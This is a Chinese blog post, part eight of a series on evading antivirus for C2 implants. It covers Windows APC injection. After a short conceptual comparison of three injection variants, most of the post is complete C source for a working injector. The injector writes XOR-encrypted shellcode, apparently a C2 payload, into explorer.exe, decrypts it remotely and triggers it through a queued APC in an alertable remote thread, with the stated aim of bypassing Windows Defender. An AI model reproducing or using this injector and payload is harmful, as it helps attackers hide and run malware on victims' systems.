【免杀】C2免杀技术（八）APC注入

本文主要写点自己的理解，如有问题，请诸位指出！

概念和流程

“APC注入”（APC Injection）是免杀与恶意代码注入技术中的一种典型方法，主要用于在目标进程中远程执行代码，常见于后门、远控、植入型木马等攻击场景。该技术的核心在于利用 Windows 的 APC（Asynchronous Procedure Call，异步过程调用）机制，将恶意代码注入到其他线程中执行，尤其是挂起状态或等待状态的线程。

APC机制等基本知识，可自行了解。

Windows系统中的APC机制允许将一个函数排入线程的APC队列中。当线程进入“警报可接收状态（Alertable State）”时，例如调用 SleepEx、WaitForSingleObjectEx 等带 Ex 后缀的函数时，APC队列中的函数就会被执行。这本质上是系统提供的一种线程内异步执行函数的机制。

我的理解：在C2免杀领域，APC注入就是“植入恶意回调队列”。我把它分为三种形式：

1、采用自身线程：将恶意代码函数排入APC队列→触发Alertable状态

2、自建远程线程：打开目标进程、自建线程、将恶意代码的函数插入APC、构造Alertable环境

3、采用目标线程：目标进程写入恶意代码→获取目标线程→将恶意代码的函数插入APC→等待或触发Alertable状态→APC自动执行

步骤	自身线程	自建远程线程	目标线程（合法线程）
1. 找目标	无（当前进程）	查找目标进程	查找目标进程与线程
2. 分配内存	VirtualAlloc	VirtualAllocEx	VirtualAllocEx
3. 写入Shellcode	直接写入	WriteProcessMemory	WriteProcessMemory
4. APC排队	QueueUserAPC	QueueUserAPC	QueueUserAPC
5. 触发执行	SleepEx 等待APC	自建远程线程中 SleepEx	强制目标线程 Alertable 状态

免杀效果演示

这里采用第二种形式做演示：自建远程线程！

因为我要用DF查杀的那个xor加载器做对比演示，本身APC结合xor就不是明智之举，因此第一种“自身线程”的形式，单纯结合xor等于没加密，静态扫描一查一个杀！第三种“目标线程”的形式倒是做出来对比效果了，但是稳定性极差，少数情况下实战可能能用到，但是不适合做演示，说服力不足！

改造好的代码

该注入器通过远程分配内存与APC机制，把加密的shellcode写入目标进程，再用自建“永远Alertable”的线程自动触发APC，达到绕过部分行为检测的内存执行效果。

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")unsigned char enc_shellcode[] = "\x97\x3d\xed\x8f\x85\x86\xa3\x75\x6e\x6b\x34\x3f\x2a\x25\x3c\x3a\x23\x26\x5a\xa7\x0b\x23\xfe\x3c\x0b\x3d\xe5\x39\x6d\x26\xe0\x27\x4e\x23\xfe\x1c\x3b\x3d\x61\xdc\x3f\x24\x26\x44\xa7\x23\x44\xae\xc7\x49\x0f\x17\x77\x42\x4b\x34\xaf\xa2\x78\x2f\x6a\xb4\x8c\x86\x27\x2f\x3a\x3d\xe5\x39\x55\xe5\x29\x49\x26\x6a\xa5\x08\xea\x0d\x76\x60\x77\x1b\x19\xfe\xee\xe3\x75\x6e\x6b\x3d\xeb\xab\x01\x09\x23\x74\xbe\x3b\xfe\x26\x73\x31\xe5\x2b\x55\x27\x6a\xa5\x8d\x3d\x3d\x91\xa2\x34\xe5\x5f\xfd\x26\x6a\xa3\x23\x5a\xbc\x26\x5a\xb5\xc2\x2a\xb4\xa7\x66\x34\x6f\xaa\x4d\x8e\x1e\x84\x22\x68\x39\x4a\x63\x30\x57\xba\x00\xb6\x33\x31\xe5\x2b\x51\x27\x6a\xa5\x08\x2a\xfe\x62\x23\x31\xe5\x2b\x69\x27\x6a\xa5\x2f\xe0\x71\xe6\x23\x74\xbe\x2a\x2d\x2f\x33\x2b\x37\x31\x34\x36\x2a\x2c\x2f\x31\x3d\xed\x87\x55\x2f\x39\x8a\x8e\x33\x34\x37\x31\x3d\xe5\x79\x9c\x21\x94\x8a\x91\x36\x1f\x6e\x22\xcb\x19\x02\x1b\x07\x05\x10\x1a\x6b\x34\x38\x22\xfc\x88\x27\xfc\x9f\x2a\xcf\x22\x1c\x53\x69\x94\xa0\x26\x5a\xbc\x26\x5a\xa7\x23\x5a\xb5\x23\x5a\xbc\x2f\x3b\x34\x3e\x2a\xcf\x54\x3d\x0c\xc9\x94\xa0\x85\x18\x2f\x26\xe2\xb4\x2f\xd3\x28\x7f\x6b\x75\x23\x5a\xbc\x2f\x3a\x34\x3f\x01\x76\x2f\x3a\x34\xd4\x3c\xfc\xf1\xad\x8a\xbb\x80\x2c\x35\x23\xfc\xaf\x23\x44\xbc\x22\xfc\xb6\x26\x44\xa7\x39\x1d\x6e\x69\x35\xea\x39\x27\x2f\xd1\x9e\x3b\x45\x4e\x91\xbe\x3d\xe7\xad\x3d\xed\xa8\x25\x04\x61\x2a\x26\xe2\x84\x26\xe2\xaf\x27\xac\xb5\x91\x94\x8a\x91\x26\x44\xa7\x39\x27\x2f\xd1\x58\x68\x73\x0e\x91\xbe\xf0\xae\x64\xf0\xf3\x6a\x75\x6e\x23\x8a\xa1\x64\xf1\xe2\x6a\x75\x6e\x80\xa6\x87\x8f\x74\x6e\x6b\x9d\xcc\x94\x8a\x91\x44\x11\x5d\x0f\x17\x6e\x9e\xe1\x94\xb9\x9b\x78\x83\xcc\x97\xe4\x7a\xf1\xa8\x9c\x2f\x5e\x92\x2e\xa9\x05\xac\x3b\x1a\x80\xad\x7f\x9b\xdc\x1a\x02\xe9\xa4\x43\x22\x61\x1c\xd2\xfe\x99\xcc\xb0\x2d\x7c\x58\xf8\x57\xe2\x0f\x1c\x40\xba\xc6\x72\xaf\x70\xdb\x00\x10\x71\xe1\x7d\x09\x2b\x1e\x34\xc1\x39\x43\xe5\x5b\x11\x81\x79\x75\x3b\x18\x10\x1c\x46\x34\x09\x0e\x1b\x1a\x51\x55\x23\x04\x0f\x07\x07\x19\x0f\x44\x40\x40\x5b\x55\x46\x08\x1a\x03\x1b\x14\x1a\x02\x17\x02\x0e\x4e\x4e\x26\x26\x27\x2e\x55\x57\x45\x45\x55\x4b\x22\x07\x05\x11\x01\x1c\x06\x4e\x25\x21\x4e\x5d\x5b\x5f\x50\x55\x3a\x19\x1c\x0a\x0e\x1b\x1a\x44\x40\x40\x5b\x5c\x4e\x27\x37\x2c\x39\x3a\x39\x38\x30\x3c\x66\x7f\x6e\xb3\x68\x27\xa6\x09\x09\xbf\x40\x64\xa6\x7e\x01\x28\xcd\x43\x33\x14\xb8\x22\xe3\x86\xe1\xbc\x6e\xbd\x0d\xd3\xa5\x0b\x86\x8d\xa6\x62\x24\x96\xe4\xa7\x64\x15\x25\x41\x93\xe6\xd1\x9e\xb5\xf5\x4e\x21\xed\x79\x51\xa7\xca\xe1\x1d\xa0\x13\xd2\xd8\xbc\x33\x3c\x1b\xeb\x04\x92\xbe\x0c\xd2\xd2\x84\xc4\xa4\x94\x67\xc0\xe7\xf3\x48\x36\x8f\x79\x11\xcb\x7b\xd7\x3d\x37\x32\xe9\xfc\xb7\x6a\xe1\xac\x27\xac\xe5\x30\x26\xf0\x58\x37\x41\x25\x54\xa0\xdf\xdd\x65\x7f\xe4\xfb\x0e\xff\x25\x03\x9b\x8e\xfb\x98\xab\xca\xf0\x6a\xe2\x5b\xae\xcb\x61\xfa\xaa\x15\xdc\x51\xd6\x58\x7c\x1b\x64\x83\xd0\xa6\x89\xe9\x2c\xa6\xff\x40\x9e\x83\xd5\x03\x41\x1d\x9c\xee\x07\x67\x80\xf9\xa3\x3f\x24\x32\x31\x0d\x28\x5e\xff\xa2\xd5\x4b\x2a\xd7\xb1\x4d\xed\x97\x38\xcb\x72\xa3\x18\x86\x4f\x41\xb6\xf1\x07\x4f\x9a\x22\x8c\xea\xe8\x5b\x09\x7e\xff\x54\x48\xcb\x55\xf6\xd9\x0b\xef\x4e\xb2\xc2\xca\x02\xe3\x6e\x2a\xcb\x9e\xde\xd7\x38\x94\xa0\x26\x5a\xbc\xd4\x6b\x75\x2e\x6b\x34\xd6\x6b\x65\x6e\x6b\x34\xd7\x2b\x75\x6e\x6b\x34\xd4\x33\xd1\x3d\x8e\x8a\xbb\x23\xe6\x3d\x38\x3d\xe7\x8c\x3d\xe7\x9a\x3d\xe7\xb1\x34\xd6\x6b\x55\x6e\x6b\x3c\xe7\x92\x34\xd4\x79\xe3\xe7\x89\x8a\xbb\x23\xf6\xaa\x4b\xf0\xae\x1f\xc3\x08\xe0\x72\x26\x6a\xb6\xeb\xab\x00\xb9\x33\x2d\x36\x23\x70\x6e\x6b\x75\x6e\x3b\xb6\x86\xf4\x88\x91\x94\x44\x57\x59\x5b\x5f\x5d\x4d\x40\x5f\x4d\x40\x5a\x75\x6e\x61\x59\x44";
size_t shellcode_len = sizeof(enc_shellcode);const char xor_key[] = "kun";
size_t xor_key_len = sizeof(xor_key) - 1;// x64 SleepEx(INFINITE, TRUE) stub (占用18字节)
unsigned char sleepStub[] = {// mov ecx, 0xFFFFFFFF0xB9, 0xFF, 0xFF, 0xFF, 0xFF,// mov edx, 0x010xBA, 0x01, 0x00, 0x00, 0x00,// mov rax, SleepEx地址(后面动态填充)0x48, 0xB8, 0,0,0,0, 0,0,0,0,// call rax0xFF, 0xD0,// ret0xC3
};
size_t stub_len = sizeof(sleepStub);DWORD64 GetRemoteProcAddress(HANDLE hProcess, const wchar_t* dllName, const char* funcName) {HMODULE hMods[1024];DWORD cbNeeded;if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {for (unsigned int i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) {wchar_t szModName[MAX_PATH];if (GetModuleBaseNameW(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(wchar_t))) {if (_wcsicmp(szModName, dllName) == 0) {HMODULE hLocal = GetModuleHandleW(dllName);FARPROC fLocal = GetProcAddress(hLocal, funcName);DWORD64 offset = (DWORD64)fLocal - (DWORD64)hLocal;return (DWORD64)hMods[i] + offset;}}}}return 0;
}// 自动查找 explorer.exe（或你指定的进程）
DWORD FindTargetProcess(LPCWSTR processName) {PROCESSENTRY32 pe = { 0 };pe.dwSize = sizeof(pe);HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSnapshot == INVALID_HANDLE_VALUE) return 0;DWORD pid = 0;if (Process32First(hSnapshot, &pe)) {do {if (_wcsicmp(pe.szExeFile, processName) == 0) {pid = pe.th32ProcessID;break;}} while (Process32Next(hSnapshot, &pe));}CloseHandle(hSnapshot);return pid;
}int InjectAPCWithStub(DWORD pid) {HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);if (!hProcess) {printf("[-] OpenProcess failed\n");return -1;}// 查找远程进程 kernel32!SleepEx 的地址DWORD64 sleepex_addr = GetRemoteProcAddress(hProcess, L"kernel32.dll", "SleepEx");if (!sleepex_addr) {printf("[-] 找不到远程 SleepEx 地址\n");CloseHandle(hProcess);return -10;}// 填充 stub 里的 SleepEx 地址memcpy(sleepStub + 10, &sleepex_addr, sizeof(DWORD64));// 分配并写入sleepStubLPVOID remoteStub = VirtualAllocEx(hProcess, NULL, stub_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!remoteStub) {printf("[-] 分配线程stub失败\n");CloseHandle(hProcess);return -2;}if (!WriteProcessMemory(hProcess, remoteStub, sleepStub, stub_len, NULL)) {printf("[-] 写入线程stub失败\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -3;}// 分配ShellcodeLPVOID remoteShell = VirtualAllocEx(hProcess, NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!remoteShell) {printf("[-] 分配shellcode失败\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -4;}// 写入加密shellcodeif (!WriteProcessMemory(hProcess, remoteShell, enc_shellcode, shellcode_len, NULL)) {printf("[-] 写入shellcode失败\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -5;}// 解密for (size_t i = 0; i < shellcode_len; ++i) {unsigned char dec = enc_shellcode[i] ^ xor_key[i % xor_key_len];if (!WriteProcessMemory(hProcess, (LPVOID)((BYTE*)remoteShell + i), &dec, 1, NULL)) {printf("[-] 解密写入失败@%zu\n", i);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -6;}}// 改为可执行DWORD oldProtect;VirtualProtectEx(hProcess, remoteShell, shellcode_len, PAGE_EXECUTE_READ, &oldProtect);// 新建线程，入口为我们的stubHANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteStub, NULL, CREATE_SUSPENDED, NULL);if (!hThread) {printf("[-] 新建远程线程失败\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -7;}// 投递APCif (!QueueUserAPC((PAPCFUNC)remoteShell, hThread, NULL)) {printf("[-] APC挂载失败\n");TerminateThread(hThread, 0);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hThread);CloseHandle(hProcess);return -8;}// 唤醒线程，进入alertable，APC立即执行ResumeThread(hThread);printf("[+] APC注入并触发完成，目标PID: %u\n", pid);// 收尾CloseHandle(hThread);CloseHandle(hProcess);return 0;
}int wmain() {LPCWSTR target = L"explorer.exe";DWORD pid = FindTargetProcess(target);if (!pid) {wprintf(L"[-] 未找到目标进程: %ls\n", target);return -1;}wprintf(L"[+] 目标进程: %ls (PID: %u)\n", target, pid);return InjectAPCWithStub(pid);
}